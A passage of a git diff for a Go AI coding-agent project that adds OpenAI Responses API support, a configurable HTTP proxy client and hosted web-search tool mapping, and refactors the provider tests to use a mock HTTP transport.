@@ -0,0 +1,22 @@
+package provider
+
+const (
+	HostedToolWebSearch                  = "web_search"
+	HostedToolWebSearchAnthropicMessages = "web_search_20250305"
+)
+
+// HostedWebSearchToolType maps a hosted web_search tool to the provider-specific wire type.
+// It is provider-neutral: the mapping depends on the tool's API family, not the vendor name.
+func HostedWebSearchToolType(providerType, name string) string {
+	if name != HostedToolWebSearch {
+		return ""
+	}
+	switch providerType {
+	case "responses":
+		return HostedToolWebSearch
+	case "messages":
+		return HostedToolWebSearchAnthropicMessages
+	default:
+		return ""
+	}
+}
diff --git a/internal/provider/hosted_tools_test.go b/internal/provider/hosted_tools_test.go
new file mode 100644
index 0000000..30e965e
--- /dev/null
+++ b/internal/provider/hosted_tools_test.go
@@ -0,0 +1,24 @@
+package provider
+
+import "testing"
+
+func TestHostedWebSearchToolType(t *testing.T) {
+	tests := []struct {
+		name         string
+		providerType string
+		toolName     string
+		want         string
+	}{
+		{name: "responses web search", providerType: "responses", toolName: "web_search", want: "web_search"},
+		{name: "messages web search", providerType: "messages", toolName: "web_search", want: "web_search_20250305"},
+		{name: "unknown tool", providerType: "responses", toolName: "other", want: ""},
+		{name: "unknown provider type", providerType: "other", toolName: "web_search", want: ""},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := HostedWebSearchToolType(tt.providerType, tt.toolName); got != tt.want {
+				t.Fatalf("HostedWebSearchToolType(%q, %q) = %q, want %q", tt.providerType, tt.toolName, got, tt.want)
+			}
+		})
+	}
+}
diff --git a/internal/provider/http_client.go b/internal/provider/http_client.go
new file mode 100644
index 0000000..7dc7e5d
--- /dev/null
+++ b/internal/provider/http_client.go
@@ -0,0 +1,27 @@
+package provider
+
+import (
+	"fmt"
+	"net/http"
+	"net/url"
+	"strings"
+	"time"
+)
+
+// NewHTTPClient returns a provider HTTP client. Empty proxyURL preserves the
+// default environment proxy behavior from http.Transport.
+func NewHTTPClient(timeout time.Duration, proxyURL string) (*http.Client, error) {
+	transport := http.DefaultTransport.(*http.Transport).Clone()
+	proxyURL = strings.TrimSpace(proxyURL)
+	if proxyURL != "" {
+		u, err := url.Parse(proxyURL)
+		if err != nil {
+			return nil, err
+		}
+		if u.Scheme == "" || u.Host == "" {
+			return nil, fmt.Errorf("proxy URL must include scheme and host")
+		}
+		transport.Proxy = http.ProxyURL(u)
+	}
+	return &http.Client{Timeout: timeout, Transport: transport}, nil
+}
diff --git a/internal/provider/http_client_test.go b/internal/provider/http_client_test.go
new file mode 100644
index 0000000..b142561
--- /dev/null
+++ b/internal/provider/http_client_test.go
@@ -0,0 +1,48 @@
+package provider
+
+import (
+	"net/http"
+	"net/url"
+	"testing"
+	"time"
+)
+
+func TestNewHTTPClientDefaultProxy(t *testing.T) {
+	client, err := NewHTTPClient(time.Second, "")
+	if err != nil {
+		t.Fatalf("NewHTTPClient: %v", err)
+	}
+	transport, ok := client.Transport.(*http.Transport)
+	if !ok {
+		t.Fatalf("transport = %T, want *http.Transport", client.Transport)
+	}
+	if transport.Proxy == nil {
+		t.Fatal("expected default environment proxy function")
+	}
+}
+
+func TestNewHTTPClientExplicitProxy(t *testing.T) {
+	client, err := NewHTTPClient(time.Second, " http://127.0.0.1:7890 ")
+	if err != nil {
+		t.Fatalf("NewHTTPClient: %v", err)
+	}
+	transport, ok := client.Transport.(*http.Transport)
+	if !ok {
+		t.Fatalf("transport = %T, want *http.Transport", client.Transport)
+	}
+	proxyURL, err := transport.Proxy(&http.Request{URL: &url.URL{Scheme: "https", Host: "api.test"}})
+	if err != nil {
+		t.Fatalf("proxy lookup: %v", err)
+	}
+	if proxyURL == nil || proxyURL.String() != "http://127.0.0.1:7890" {
+		t.Fatalf("proxy = %v, want http://127.0.0.1:7890", proxyURL)
+	}
+}
+
+func TestNewHTTPClientRejectsInvalidProxy(t *testing.T) {
+	for _, proxyURL := range []string{"http://[::1", "127.0.0.1:7890", "http://"} {
+		if _, err := NewHTTPClient(time.Second, proxyURL); err == nil {
+			t.Fatalf("expected error for proxy URL %q", proxyURL)
+		}
+	}
+}
diff --git a/internal/provider/openai/provider.go b/internal/provider/openai/provider.go
index 9b261cf..923fc5e 100644
--- a/internal/provider/openai/provider.go
+++ b/internal/provider/openai/provider.go
@@ -12,6 +12,7 @@ import (
 	"strings"
 	"time"
 
+	"github.com/startvibecoding/vibecoding/internal/config"
 	"github.com/startvibecoding/vibecoding/internal/provider"
 	"github.com/startvibecoding/vibecoding/internal/ua"
 )
@@ -26,11 +27,20 @@ type Provider struct {
 	// Configuration options
 	disableReasoning bool   // Disable reasoning_content support for incompatible APIs
 	thinkingFormat   string // "", "openai", "deepseek", "xiaomi"
+	useResponsesAPI  bool
+	responsesConfig  *responsesConfig
 
 	// Retry configuration
 	retryConfig *provider.RetryConfig
 }
 
+type responsesConfig struct {
+	reasoningSummary     string
+	promptCacheEnabled   bool
+	promptCacheKey       string
+	promptCacheRetention string
+}
+
 // DefaultModels returns the default OpenAI model list.
 func DefaultModels() []*provider.Model {
 	return []*provider.Model{
@@ -64,6 +74,22 @@ func NewProvider(apiKey, baseURL string) *Provider {
 
 // NewProviderWithModels creates a new OpenAI provider with custom models.
 func NewProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Provider {
+	p, err := NewProviderWithModelsAndProxy(apiKey, baseURL, "", models)
+	if err != nil {
+		return newProviderWithHTTPClient(apiKey, baseURL, models, &http.Client{Timeout: 30 * time.Minute})
+	}
+	return p
+}
+
+func NewProviderWithModelsAndProxy(apiKey, baseURL, proxyURL string, models []*provider.Model) (*Provider, error) {
+	client, err := provider.NewHTTPClient(30*time.Minute, proxyURL)
+	if err != nil {
+		return nil, fmt.Errorf("configure http proxy: %w", err)
+	}
+	return newProviderWithHTTPClient(apiKey, baseURL, models, client), nil
+}
+
+func newProviderWithHTTPClient(apiKey, baseURL string, models []*provider.Model, client *http.Client) *Provider {
 	if baseURL == "" {
 		baseURL = "https://api.openai.com/v1"
 	}
@@ -75,7 +101,11 @@ func NewProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Pr
 		BaseProvider: provider.NewBaseProvider("openai", models),
 		apiKey:       apiKey,
 		baseURL:      strings.TrimRight(baseURL, "/"),
-		client:       &http.Client{Timeout: 30 * time.Minute},
+		client:       client,
+		responsesConfig: &responsesConfig{
+			reasoningSummary:   "auto",
+			promptCacheEnabled: true,
+		},
 	}
 
 	// Check environment variable to disable reasoning
@@ -86,6 +116,21 @@ func NewProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Pr
 	return p
 }
 
+// SetUseResponsesAPI switches the provider to the Responses API.
+func (p *Provider) SetUseResponsesAPI(enabled bool) {
+	p.useResponsesAPI = enabled
+}
+
+// SetResponsesConfig applies Responses API-specific configuration.
+func (p *Provider) SetResponsesConfig(cfg config.ResponsesConfig) {
+	p.responsesConfig = &responsesConfig{
+		reasoningSummary:     cfg.ReasoningSummary,
+		promptCacheEnabled:   cfg.PromptCacheEnabled == nil || *cfg.PromptCacheEnabled,
+		promptCacheKey:       cfg.PromptCacheKey,
+		promptCacheRetention: cfg.PromptCacheRetention,
+	}
+}
+
 // DisableReasoning disables reasoning_content support for incompatible APIs.
 func (p *Provider) DisableReasoning() {
 	p.disableReasoning = true
@@ -115,6 +160,8 @@ type openAIRequest struct {
 	Tools               []openAITool    `json:"tools,omitempty"`
 	MaxTokens           int             `json:"max_tokens,omitempty"`
 	MaxCompletionTokens int             `json:"max_completion_tokens,omitempty"`
+	Temperature         *float64        `json:"temperature,omitempty"`
+	TopP                *float64        `json:"top_p,omitempty"`
 	Stream              bool            `json:"stream"`
 	StreamOptions       *streamOptions  `json:"stream_options,omitempty"`
 	ReasoningEffort     string          `json:"reasoning_effort,omitempty"`
@@ -202,6 +249,13 @@ type openAIUsageResponse struct {
 
 // Chat implements the streaming chat interface.
 func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
+	if p.useResponsesAPI {
+		return p.chatResponses(ctx, params)
+	}
+	return p.chatCompletions(ctx, params)
+}
+
+func (p *Provider) chatCompletions(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
 	ch := make(chan provider.StreamEvent, 100)
 
 	go func() {
@@ -235,6 +289,8 @@ func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan
 			Tools:         tools,
 			Stream:        true,
 			StreamOptions: &streamOptions{IncludeUsage: true},
+			Temperature:   params.Temperature,
+			TopP:          params.TopP,
 		}
 		if maxTokensField(model) == "max_completion_tokens" {
 			reqBody.MaxCompletionTokens = maxTokens
@@ -359,8 +415,6 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 	scanner.Buffer(make([]byte, 1024*1024), 1024*1024)
 
 	var (
-		textContent     string
-		reasonContent   string
 		toolCalls       []provider.ToolCallBlock
 		toolCallBuffers = make(map[int]*strings.Builder)
 		stopReason      string
@@ -395,40 +449,14 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 		}
 
 		if chunk.Usage != nil {
-			// Only update usage if not already set (to avoid overwriting with partial values from different chunks)
-			if usage == nil {
-				usage = &provider.Usage{
-					Input:       chunk.Usage.PromptTokens,
-					Output:      chunk.Usage.CompletionTokens,
-					TotalTokens: chunk.Usage.TotalTokens,
-				}
-				if chunk.Usage.PromptTokensDetails != nil {
-					usage.CacheRead = chunk.Usage.PromptTokensDetails.CachedTokens
-				}
-			} else {
-				// Update only if new values are provided and current values are 0
-				if chunk.Usage.PromptTokens > 0 && usage.Input == 0 {
-					usage.Input = chunk.Usage.PromptTokens
-				}
-				if chunk.Usage.CompletionTokens > 0 && usage.Output == 0 {
-					usage.Output = chunk.Usage.CompletionTokens
-				}
-				if chunk.Usage.TotalTokens > 0 && usage.TotalTokens == 0 {
-					usage.TotalTokens = chunk.Usage.TotalTokens
-				}
-				if chunk.Usage.PromptTokensDetails != nil && chunk.Usage.PromptTokensDetails.CachedTokens > 0 && usage.CacheRead == 0 {
-					usage.CacheRead = chunk.Usage.PromptTokensDetails.CachedTokens
-				}
-			}
+			mergeOpenAIUsage(&usage, chunk.Usage)
 		}
 
 		for _, choice := range chunk.Choices {
 			if choice.Delta.Content != "" {
-				textContent += choice.Delta.Content
 				ch <- provider.StreamEvent{Type: provider.StreamTextDelta, TextDelta: choice.Delta.Content}
 			}
 			if !p.disableReasoning && choice.Delta.Reasoning != nil && *choice.Delta.Reasoning != "" {
-				reasonContent += *choice.Delta.Reasoning
 				ch <- provider.StreamEvent{Type: provider.StreamThinkDelta, ThinkDelta: *choice.Delta.Reasoning}
 			}
 			for _, tc := range choice.Delta.ToolCalls {
@@ -438,7 +466,6 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 				}
 				if _, ok := toolCallBuffers[idx]; !ok {
 					toolCallBuffers[idx] = &strings.Builder{}
-					// Ensure slice is long enough
 					for len(toolCalls) <= idx {
 						toolCalls = append(toolCalls, provider.ToolCallBlock{})
 					}
@@ -470,8 +497,6 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 		if buf, ok := toolCallBuffers[i]; ok {
 			if tc.ID == "" {
 				// Some OpenAI-compatible providers omit tool call IDs in stream deltas.
-				// Generate a stable fallback ID so subsequent tool results can always
-				// bind to the corresponding assistant tool call.
 				tc.ID = fmt.Sprintf("toolcall_%d", i)
 			}
 			tc.Arguments = json.RawMessage(buf.String())
@@ -486,6 +511,35 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 	ch <- provider.StreamEvent{Type: provider.StreamDone, StopReason: stopReason}
 }
 
+func mergeOpenAIUsage(dst **provider.Usage, src *openAIUsageResponse) {
+	if src == nil {
+		return
+	}
+	if *dst == nil {
+		*dst = &provider.Usage{
+			Input:       src.PromptTokens,
+			Output:      src.CompletionTokens,
+			TotalTokens: src.TotalTokens,
+		}
+		if src.PromptTokensDetails != nil {
+			(*dst).CacheRead = src.PromptTokensDetails.CachedTokens
+		}
+		return
+	}
+	if src.PromptTokens > 0 && (*dst).Input == 0 {
+		(*dst).Input = src.PromptTokens
+	}
+	if src.CompletionTokens > 0 && (*dst).Output == 0 {
+		(*dst).Output = src.CompletionTokens
+	}
+	if src.TotalTokens > 0 && (*dst).TotalTokens == 0 {
+		(*dst).TotalTokens = src.TotalTokens
+	}
+	if src.PromptTokensDetails != nil && src.PromptTokensDetails.CachedTokens > 0 && (*dst).CacheRead == 0 {
+		(*dst).CacheRead = src.PromptTokensDetails.CachedTokens
+	}
+}
+
 func openAIReasoningEffort(level provider.ThinkingLevel) string {
 	switch level {
 	case provider.ThinkingMinimal, provider.ThinkingLow:
@@ -634,6 +688,9 @@ func (p *Provider) convertMessages(params provider.ChatParams, forceAssistantRea
 func (p *Provider) convertTools(tools []provider.ToolDefinition) []openAITool {
 	var result []openAITool
 	for _, t := range tools {
+		if t.Kind == "hosted" {
+			continue
+		}
 		result = append(result, openAITool{Type: "function", Function: openAIFunction{Name: t.Name, Description: t.Description, Parameters: t.Parameters}})
 	}
 	return result
diff --git a/internal/provider/openai/provider_test.go b/internal/provider/openai/provider_test.go
index af57e86..0c43ef6 100644
--- a/internal/provider/openai/provider_test.go
+++ b/internal/provider/openai/provider_test.go
@@ -1,46 +1,23 @@
 package openai
 
 import (
+	"bytes"
 	"context"
 	"encoding/json"
-	"fmt"
 	"io"
 	"net/http"
-	"net/http/httptest"
+	"net/url"
 	"strings"
 	"testing"
 
+	"github.com/startvibecoding/vibecoding/internal/config"
 	"github.com/startvibecoding/vibecoding/internal/provider"
 )
 
 // ─── helpers ─────────────────────────────────────────────────────────────────
 
-func newTestServer(t *testing.T, sse string) *httptest.Server {
+func chatAndCollect(t *testing.T, p *Provider, params provider.ChatParams) []provider.StreamEvent {
 	t.Helper()
-	defer func() {
-		if r := recover(); r != nil {
-			if strings.Contains(fmt.Sprint(r), "httptest: failed to listen on a port") {
-				t.Skipf("local httptest listener unavailable: %v", r)
-			}
-			panic(r)
-		}
-	}()
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte(sse))
-	}))
-	t.Cleanup(srv.Close)
-	return srv
-}
-
-func chatAndCollect(t *testing.T, srv *httptest.Server) []provider.StreamEvent {
-	t.Helper()
-	p := NewProvider("fake-key", srv.URL)
-	params := provider.ChatParams{
-		Messages: []provider.Message{provider.NewUserMessage("hi")},
-		Abort:    make(chan struct{}),
-	}
 	var events []provider.StreamEvent
 	for e := range p.Chat(context.Background(), params) {
 		events = append(events, e)
@@ -59,24 +36,60 @@ func mustUsage(t *testing.T, events []provider.StreamEvent) *provider.Usage {
 	return nil
 }
 
+type roundTripFunc func(*http.Request) (*http.Response, error)
+
+func (f roundTripFunc) RoundTrip(r *http.Request) (*http.Response, error) {
+	return f(r)
+}
+
+func newMockOpenAIProvider(t *testing.T, models []*provider.Model, sse string, bodyCh chan<- string, check func(*http.Request)) *Provider {
+	t.Helper()
+	p := NewProviderWithModels("fake-key", "https://api.test/v1", models)
+	p.client = &http.Client{Transport: roundTripFunc(func(r *http.Request) (*http.Response, error) {
+		if check != nil {
+			check(r)
+		}
+		if bodyCh != nil {
+			body, err := io.ReadAll(r.Body)
+			if err != nil {
+				return nil, err
+			}
+			bodyCh <- string(body)
+		}
+		return &http.Response{
+			StatusCode: http.StatusOK,
+			Header:     make(http.Header),
+			Body:       io.NopCloser(bytes.NewBufferString(sse)),
+			Request:    r,
+		}, nil
+	})}
+	return p
+}
+
+func TestOpenAIProviderHTTPProxy(t *testing.T) {
+	p, err := NewProviderWithModelsAndProxy("fake-key", "https://api.test/v1", "http://127.0.0.1:7890", []*provider.Model{{ID: "m1"}})
+	if err != nil {
+		t.Fatalf("provider with proxy: %v", err)
+	}
+	transport, ok := p.client.Transport.(*http.Transport)
+	if !ok {
+		t.Fatalf("transport = %T, want *http.Transport", p.client.Transport)
+	}
+	proxyURL, err := transport.Proxy(&http.Request{URL: &url.URL{Scheme: "https", Host: "api.test"}})
+	if err != nil {
+		t.Fatalf("proxy lookup: %v", err)
+	}
+	if proxyURL == nil || proxyURL.String() != "http://127.0.0.1:7890" {
+		t.Fatalf("proxy = %v, want http://127.0.0.1:7890", proxyURL)
+	}
+}
+
 func TestOpenAIThinkingFormatDeepSeekAutoDetect(t *testing.T) {
 	bodyCh := make(chan string, 1)
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		body, err := io.ReadAll(r.Body)
-		if err != nil {
-			http.Error(w, err.Error(), http.StatusInternalServerError)
-			return
-		}
-		bodyCh <- string(body)
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte("data: [DONE]\n"))
-	}))
-	t.Cleanup(srv.Close)
-
-	p := NewProviderWithModels("fake-key", srv.URL+"/deepseek", []*provider.Model{
+	p := newMockOpenAIProvider(t, []*provider.Model{
 		{ID: "deepseek-test", Reasoning: true},
-	})
+	}, "data: [DONE]\n", bodyCh, nil)
+	p.baseURL = p.baseURL + "/deepseek"
 	params := provider.ChatParams{
 		ModelID:       "deepseek-test",
 		Messages:      []provider.Message{provider.NewUserMessage("hi")},
@@ -106,22 +119,9 @@ func TestOpenAIThinkingFormatDeepSeekAutoDetect(t *testing.T) {
 
 func TestOpenAIThinkingFormatFromModelCompat(t *testing.T) {
 	bodyCh := make(chan string, 1)
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		body, err := io.ReadAll(r.Body)
-		if err != nil {
-			http.Error(w, err.Error(), http.StatusInternalServerError)
-			return
-		}
-		bodyCh <- string(body)
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte("data: [DONE]\n"))
-	}))
-	t.Cleanup(srv.Close)
-
-	p := NewProviderWithModels("fake-key", srv.URL, []*provider.Model{
+	p := newMockOpenAIProvider(t, []*provider.Model{
 		{ID: "compat-test", Reasoning: true, Compat: &provider.ModelCompat{ThinkingFormat: "deepseek"}},
-	})
+	}, "data: [DONE]\n", bodyCh, nil)
 	params := provider.ChatParams{
 		ModelID:       "compat-test",
 		Messages:      []provider.Message{provider.NewUserMessage("hi")},
@@ -150,21 +150,8 @@ func TestOpenAIThinkingFormatFromModelCompat(t *testing.T) {
 
 func TestOpenAIModelCompatRequestFields(t *testing.T) {
 	bodyCh := make(chan string, 1)
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		body, err := io.ReadAll(r.Body)
-		if err != nil {
-			http.Error(w, err.Error(), http.StatusInternalServerError)
-			return
-		}
-		bodyCh <- string(body)
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte("data: [DONE]\n"))
-	}))
-	t.Cleanup(srv.Close)
-
 	supportsReasoningEffort := false
-	p := NewProviderWithModels("fake-key", srv.URL, []*provider.Model{
+	p := newMockOpenAIProvider(t, []*provider.Model{
 		{
 			ID:        "compat-fields",
 			Reasoning: true,
@@ -173,7 +160,7 @@ func TestOpenAIModelCompatRequestFields(t *testing.T) {
 				SupportsReasoningEffort: &supportsReasoningEffort,
 			},
 		},
-	})
+	}, "data: [DONE]\n", bodyCh, nil)
 	params := provider.ChatParams{
 		ModelID:       "compat-fields",
 		Messages:      []provider.Message{provider.NewUserMessage("hi")},
@@ -206,27 +193,14 @@ func TestOpenAIModelCompatRequestFields(t *testing.T) {
 
 func TestOpenAIRequiresReasoningContentOnAssistant(t *testing.T) {
 	bodyCh := make(chan string, 1)
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		body, err := io.ReadAll(r.Body)
-		if err != nil {
-			http.Error(w, err.Error(), http.StatusInternalServerError)
-			return
-		}
-		bodyCh <- string(body)
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte("data: [DONE]\n"))
-	}))
-	t.Cleanup(srv.Close)
-
-	p := NewProviderWithModels("fake-key", srv.URL, []*provider.Model{
+	p := newMockOpenAIProvider(t, []*provider.Model{
 		{
 			ID: "compat-reasoning",
 			Compat: &provider.ModelCompat{
 				RequiresReasoningContentOnAssistant: true,
 			},
 		},
-	})
+	}, "data: [DONE]\n", bodyCh, nil)
 	params := provider.ChatParams{
 		ModelID: "compat-reasoning",
 		Messages: []provider.Message{
@@ -266,6 +240,230 @@ func TestOpenAIRequiresReasoningContentOnAssistant(t *testing.T) {
 	}
 }
 
+func TestOpenAIResponsesAPIRequest(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{
+		{ID: "responses-test", Reasoning: true},
+	}, "data: [DONE]\n", bodyCh, func(r *http.Request) {
+		if r.URL.Path != "/v1/responses" {
+			t.Fatalf("path = %q, want /v1/responses", r.URL.Path)
+		}
+	})
+	p.SetUseResponsesAPI(true)
+
+	params := provider.ChatParams{
+		ModelID:       "responses-test",
+		SystemPrompt:  "You are a helper.",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingXHigh,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if raw["model"] != "responses-test" {
+		t.Fatalf("model = %#v, want responses-test", raw["model"])
+	}
+	if raw["instructions"] != "You are a helper." {
+		t.Fatalf("instructions = %#v, want system prompt", raw["instructions"])
+	}
+	if raw["stream"] != true {
+		t.Fatalf("stream = %#v, want true", raw["stream"])
+	}
+	if _, ok := raw["max_output_tokens"]; !ok {
+		t.Fatalf("max_output_tokens missing: %#v", raw)
+	}
+	if _, ok := raw["input"].([]any); !ok {
+		t.Fatalf("input = %#v, want array", raw["input"])
+	}
+	if _, ok := raw["reasoning"].(map[string]any); !ok {
+		t.Fatalf("reasoning = %#v, want object", raw["reasoning"])
+	}
+	reasoning := raw["reasoning"].(map[string]any)
+	if reasoning["effort"] != "high" {
+		t.Fatalf("reasoning.effort = %#v, want high", reasoning["effort"])
+	}
+	if reasoning["summary"] != "auto" {
+		t.Fatalf("reasoning.summary = %#v, want auto", reasoning["summary"])
+	}
+	if raw["prompt_cache_key"] == "" {
+		t.Fatalf("prompt_cache_key missing: %#v", raw)
+	}
+}
+
+func TestOpenAIResponsesAPIConfigOverrides(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{
+		{ID: "responses-test", Reasoning: true},
+	}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+	p.SetResponsesConfig(config.ResponsesConfig{
+		ReasoningSummary:     "concise",
+		PromptCacheKey:       "custom-cache-key",
+		PromptCacheRetention: "24h",
+	})
+
+	params := provider.ChatParams{
+		ModelID:       "responses-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingMinimal,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	reasoning, ok := raw["reasoning"].(map[string]any)
+	if !ok {
+		t.Fatalf("reasoning = %#v, want object", raw["reasoning"])
+	}
+	if reasoning["effort"] != "minimal" {
+		t.Fatalf("reasoning.effort = %#v, want minimal", reasoning["effort"])
+	}
+	if reasoning["summary"] != "concise" {
+		t.Fatalf("reasoning.summary = %#v, want concise", reasoning["summary"])
+	}
+	if raw["prompt_cache_key"] != "custom-cache-key" {
+		t.Fatalf("prompt_cache_key = %#v, want custom-cache-key", raw["prompt_cache_key"])
+	}
+	if raw["prompt_cache_retention"] != "24h" {
+		t.Fatalf("prompt_cache_retention = %#v, want 24h", raw["prompt_cache_retention"])
+	}
+}
+
+func TestOpenAIResponsesAPIHostedWebSearchTool(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "responses-test"}}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+
+	params := provider.ChatParams{
+		ModelID:  "responses-test",
+		Messages: []provider.Message{provider.NewUserMessage("latest news?")},
+		Tools: []provider.ToolDefinition{
+			{Name: "web_search", Kind: "hosted", Provider: "gpt", ProviderType: "responses"},
+		},
+		Abort: make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	tools, ok := raw["tools"].([]any)
+	if !ok || len(tools) != 1 {
+		t.Fatalf("tools = %#v, want one hosted tool", raw["tools"])
+	}
+	tool, ok := tools[0].(map[string]any)
+	if !ok {
+		t.Fatalf("tool = %#v, want object", tools[0])
+	}
+	if tool["type"] != "web_search" {
+		t.Fatalf("tool.type = %#v, want web_search", tool["type"])
+	}
+	if _, ok := tool["name"]; ok {
+		t.Fatalf("hosted web search should not include function name: %#v", tool)
+	}
+}
+
+func TestOpenAIResponsesAPIStreamToolCall(t *testing.T) {
+	lines := []string{
+		`{"type":"response.output_text.delta","delta":"Working"}`,
+		`{"type":"response.function_call_arguments.delta","item_id":"call_1","delta":"{\"command\":"}`,
+		`{"type":"response.function_call_arguments.delta","item_id":"call_1","delta":"\"echo hi\"}"}`,
+		`{"type":"response.output_item.done","item":{"id":"call_1","type":"function_call","call_id":"call_1","name":"bash"}}`,
+		`{"type":"response.completed","response":{"status":"completed","usage":{"input_tokens":100,"output_tokens":5,"total_tokens":105,"input_tokens_details":{"cached_tokens":75},"output_tokens_details":{"reasoning_tokens":3}}}}`,
+	}
+	var b strings.Builder
+	for _, line := range lines {
+		b.WriteString("data: ")
+		b.WriteString(line)
+		b.WriteByte('\n')
+	}
+	b.WriteString("data: [DONE]\n")
+
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock", Reasoning: true}}, b.String(), nil, nil)
+	p.SetUseResponsesAPI(true)
+
+	params := provider.ChatParams{
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	}
+	var events []provider.StreamEvent
+	for e := range p.Chat(context.Background(), params) {
+		events = append(events, e)
+	}
+	if len(events) == 0 {
+		t.Fatal("no events returned")
+	}
+
+	var (
+		gotText  string
+		gotTool  *provider.ToolCallBlock
+		gotUsage *provider.Usage
+		gotDone  bool
+	)
+	for _, e := range events {
+		switch e.Type {
+		case provider.StreamTextDelta:
+			gotText += e.TextDelta
+		case provider.StreamToolCall:
+			gotTool = e.ToolCall
+		case provider.StreamUsage:
+			gotUsage = e.Usage
+		case provider.StreamDone:
+			gotDone = true
+		}
+	}
+	if gotText != "Working" {
+		t.Fatalf("text = %q, want Working", gotText)
+	}
+	if gotTool == nil {
+		t.Fatal("missing StreamToolCall event")
+	}
+	if gotTool.ID != "call_1" {
+		t.Fatalf("tool ID = %q, want call_1", gotTool.ID)
+	}
+	if gotTool.Name != "bash" {
+		t.Fatalf("tool name = %q, want bash", gotTool.Name)
+	}
+	if string(gotTool.Arguments) != "{\"command\":\"echo hi\"}" {
+		t.Fatalf("tool args = %q, want %q", string(gotTool.Arguments), "{\"command\":\"echo hi\"}")
+	}
+	if gotUsage == nil || gotUsage.CacheRead != 75 {
+		t.Fatalf("usage = %#v, want cacheRead 75", gotUsage)
+	}
+	if gotUsage.Reasoning != 3 {
+		t.Fatalf("usage reasoning = %d, want 3", gotUsage.Reasoning)
+	}
+	if !gotDone {
+		t.Fatal("missing StreamDone event")
+	}
+}
+
 // ─── standard OpenAI SSE scenarios ───────────────────────────────────────────
 
 // TestOpenAICache_CacheHit: final SSE chunk carries full usage with cached tokens.
@@ -275,8 +473,8 @@ func TestOpenAICache_CacheHit(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-1\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}],\"usage\":{\"prompt_tokens\":1000,\"completion_tokens\":5,\"total_tokens\":1005,\"prompt_tokens_details\":{\"cached_tokens\":750}}}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 1000 {
 		t.Errorf("Input = %d, want 1000", u.Input)
@@ -298,8 +496,8 @@ func TestOpenAICache_NoCache(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-2\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}],\"usage\":{\"prompt_tokens\":200,\"completion_tokens\":8,\"total_tokens\":208}}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
